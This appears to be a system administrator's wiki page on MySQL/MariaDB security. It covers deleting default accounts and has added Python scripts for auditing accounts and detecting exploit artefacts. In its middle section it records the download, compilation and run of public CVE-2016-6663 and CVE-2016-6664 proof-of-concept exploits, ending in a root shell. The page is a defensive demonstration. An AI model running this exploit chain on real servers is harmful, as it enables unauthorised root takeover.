MySQL, MariaDB, Percona

  • If an attacker has an account on the machine and can access (write to) the database, root privileges can be seized.
  • This is especially dangerous if the MySQL default users and similar accounts are still present.
Default users
  • Entries with no password or no user name should be deleted at installation time.
MariaDB [(none)]> use mysql;
MariaDB [mysql]> select Host,User,Password from user;
+-----------+------+-------------------------------------------+
| Host      | User | Password                                  |
+-----------+------+-------------------------------------------+
| localhost | root | *1B1F13007F2FA68140D751B563EB49E0186A116B |
| rigel-b   | root |                                           |
| 127.0.0.1 | root |                                           |
| ::1       | root |                                           |
| localhost |      |                                           |
| rigel-b   |      |                                           |
+-----------+------+-------------------------------------------+
  • Delete them with the following commands:
MariaDB [(none)]> use mysql;
MariaDB [mysql]> delete from user where user='';  
MariaDB [mysql]> delete from user where password='';
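Added example (not from the original page): a small Python audit of the mysql.user listing above that separates anonymous accounts, password-less accounts and accounts that are safe to keep, and emits DROP USER statements for the first two groups. The rows are a constructed sample copied from the table above, plus one assumed `svc` account that authenticates with the unix_socket plugin; the `plugin` column is assumed to be selected alongside Host, User and Password.

```python
"""Audit mysql.user for anonymous and password-less accounts.

Added example, not part of the page. Input rows are what
  SELECT Host, User, Password, plugin FROM mysql.user;
returns on MariaDB / MySQL 5.5-5.6 (MySQL 5.7+ stores the hash in
authentication_string instead of Password).
"""

# Constructed sample: the listing above plus one assumed unix_socket account.
SAMPLE_ROWS = [
    ("localhost", "root", "*1B1F13007F2FA68140D751B563EB49E0186A116B", ""),
    ("rigel-b",   "root", "", ""),
    ("127.0.0.1", "root", "", ""),
    ("::1",       "root", "", ""),
    ("localhost", "",     "", ""),
    ("rigel-b",   "",     "", ""),
    ("localhost", "svc",  "", "unix_socket"),   # assumed: empty Password is legitimate here
]

# Plugins for which an empty Password column really means "no password".
PASSWORD_PLUGINS = ("", "mysql_native_password", "mysql_old_password")


def quote_ident(value):
    """Single-quote an account name or host for use in DROP USER."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def classify(rows):
    """Split rows into (anonymous, passwordless, keep) lists of (host, user)."""
    anonymous, passwordless, keep = [], [], []
    for host, user, password, plugin in rows:
        if user == "":
            anonymous.append((host, user))
        elif password == "" and plugin in PASSWORD_PLUGINS:
            passwordless.append((host, user))
        else:
            # Hashed password, or an auth plugin (unix_socket, PAM, ...) that
            # does not use the Password column at all.
            keep.append((host, user))
    return anonymous, passwordless, keep


def drop_statements(rows):
    """DROP USER statements for every anonymous or password-less account."""
    anonymous, passwordless, _keep = classify(rows)
    return [f"DROP USER {quote_ident(user)}@{quote_ident(host)};"
            for host, user in anonymous + passwordless]


if __name__ == "__main__":
    for stmt in drop_statements(SAMPLE_ROWS):
        print(stmt)
```

Two points this makes visible that the raw `delete from user where password=''` does not: an account whose plugin is unix_socket (or PAM) has an empty Password column by design and would be deleted too, and DROP USER removes the account from all grant tables and takes effect immediately, whereas DELETE FROM mysql.user only touches that one table and needs FLUSH PRIVILEGES before the running server notices.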
Seizing the mysql user account
$ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c
$ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient
[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test

MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)

CVE-2016-6663 / CVE-2016-5616

For testing purposes only. Do no harm.

Discovered/Coded by:

Dawid Golunski 
http://legalhackers.com


[+] Starting the exploit as: 
uid=502(iseki) gid=100(users) 所属グループ=100(users)

[+] Connecting to the database `test` as @localhost

[+] Creating exploit temp directory /tmp/mysql_privesc_exploit

[+] Creating mysql tables 

DROP TABLE IF EXISTS exploit_table 
DROP TABLE IF EXISTS mysql_suid_shell 
CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 

[+] Copying bash into the mysql_suid_shell table.
   After the exploitation the following file/table will be assigned SUID and executable bits : 
-rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Entering the race loop... Hang in there...
->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->

[+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: 

-rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Spawning the mysql SUID shell now... 
   Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)

mysql_suid_shell.MYD-4.1$ whoami
mysql
Seizing the root account from the mysql account
mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err 

MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit 
mysql-chowned.sh (ver. 1.0)

CVE-2016-6664 / CVE-2016-5617

Discovered and coded by: 

Dawid Golunski 
http://legalhackers.com 

[+] Starting the exploit as 
uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users)

[+] Target MySQL log file set to /var/mysql/rigel-b.err

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

[+] Symlink created at: 
lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload

[+] Waiting for MySQL to re-open the logs/MySQL service restart...

[+] Waiting for MySQL to re-open the logs/MySQL service restart...
./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません
Do you want to kill mysqld process  to instantly get root? :) ? [y/n] y
Got it. Executing 'killall mysqld' now...

[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: 
-rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: 
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh

Got root! The database server has been ch-OWNED ! 

[+] Spawning the rootshell /tmp/mysqlrootsh now!

mysqlrootsh-4.1# whoami
root
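Added example, not part of the page and not part of Golunski's PoC code: defensive checks for the artefacts the two runs above leave on a host. It looks for SUID/SGID files under the temp directories (the first run leaves mysql_suid_shell.MYD there with mode -rwsrwxrwx), a MySQL error log that has been replaced by a symlink, and an /etc/ld.so.preload that is a symlink, not owned by root, or that preloads a library from outside the system library directories (/tmp/privesclib.so in the second run). It also checks my.cnf for symbolic-links=0 in the [mysqld] section, a hardening setting not mentioned on the page that makes the server ignore the DATA DIRECTORY clause the first PoC relies on. All paths are parameters; build_demo_tree() constructs a throw-away sample tree so the checks can be exercised offline.

```python
"""Check a host for the artefacts left by the MySQL privesc PoCs above.

Added example; not part of the page or of the PoC code.
"""
import os
import stat
import tempfile
from pathlib import Path

SYSTEM_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")


def preload_findings(preload_path="/etc/ld.so.preload", expected_uid=0):
    """ld.so.preload should be absent, or a root-owned regular file whose
    entries all live under the system library directories."""
    findings = []
    p = Path(preload_path)
    if p.is_symlink():
        findings.append(f"{preload_path} is a symlink -> {os.readlink(preload_path)}")
    if not p.exists():
        return findings
    st = p.stat()
    if st.st_uid != expected_uid:
        findings.append(f"{preload_path} owned by uid {st.st_uid}, expected {expected_uid}")
    for raw in p.read_text().splitlines():
        lib = raw.strip()
        if lib and not any(lib.startswith(d + "/") for d in SYSTEM_LIB_DIRS):
            findings.append(f"{preload_path} preloads {lib} from outside the system lib dirs")
    return findings


def errorlog_findings(log_path):
    """mysqld_safe chowns the error log to the mysql user; a symlink at that
    path redirects the chown to the link target (ld.so.preload in the run above)."""
    p = Path(log_path)
    if p.is_symlink():
        return [f"{log_path} is a symlink -> {os.readlink(log_path)}"]
    return []


def suid_findings(dirs=("/tmp", "/var/tmp")):
    """Regular files with the SUID or SGID bit under world-writable temp dirs."""
    findings = []
    for d in dirs:
        for root, _subdirs, files in os.walk(d):
            for name in files:
                full = os.path.join(root, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    findings.append(f"{full} {stat.filemode(st.st_mode)} uid={st.st_uid}")
    return findings


def symlinks_disabled(my_cnf_path="/etc/my.cnf"):
    """True if [mysqld] sets symbolic-links=0 or skip-symbolic-links, which
    makes the server ignore DATA DIRECTORY / INDEX DIRECTORY in CREATE TABLE."""
    try:
        lines = Path(my_cnf_path).read_text().splitlines()
    except OSError:
        return False
    section = None
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld" or not line:
            continue
        key, _sep, value = (part.strip() for part in line.partition("="))
        key = key.lower().replace("_", "-")
        if key == "skip-symbolic-links" or (key == "symbolic-links" and value.lower() in ("0", "off")):
            return True
    return False


def run_all(preload="/etc/ld.so.preload", error_log="/var/mysql/rigel-b.err",
            my_cnf="/etc/my.cnf", tmp_dirs=("/tmp", "/var/tmp"), expected_uid=0):
    """Collect every finding; the error-log default is the path from the run above."""
    findings = (preload_findings(preload, expected_uid)
                + errorlog_findings(error_log)
                + suid_findings(tmp_dirs))
    if not symlinks_disabled(my_cnf):
        findings.append(f"{my_cnf}: [mysqld] does not set symbolic-links=0")
    return findings


def build_demo_tree():
    """Constructed sample tree reproducing the artefacts seen in the runs above."""
    base = Path(tempfile.mkdtemp(prefix="mysql_privesc_check_"))
    (base / "tmp").mkdir()
    shell = base / "tmp" / "mysql_suid_shell.MYD"
    shell.write_bytes(b"\x7fELF")            # stand-in for the copied bash binary
    shell.chmod(0o4777)                      # -rwsrwxrwx as in the PoC output
    preload = base / "ld.so.preload"
    preload.write_text("/tmp/privesclib.so\n")
    log = base / "rigel-b.err"
    log.symlink_to(preload)                  # error log redirected to ld.so.preload
    cnf = base / "my.cnf"
    cnf.write_text("[mysqld]\n# symbolic-links not set\n")
    return {"tmp": base / "tmp", "preload": preload, "log": log, "cnf": cnf, "uid": os.getuid()}


if __name__ == "__main__":
    t = build_demo_tree()
    for finding in run_all(str(t["preload"]), str(t["log"]), str(t["cnf"]), [str(t["tmp"])], t["uid"]):
        print(finding)
```

Run with no arguments it checks the constructed tree; point run_all() at the real paths (error log location from `SHOW VARIABLES LIKE 'log_error'`) for a host check. The SUID walk is the noisiest signal but also the one that survives a reboot, since the race leaves the SUID copy in place until someone removes it.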

Last-modified: 2016-11-11 (Fri) 15:46:20 (JST) by iseki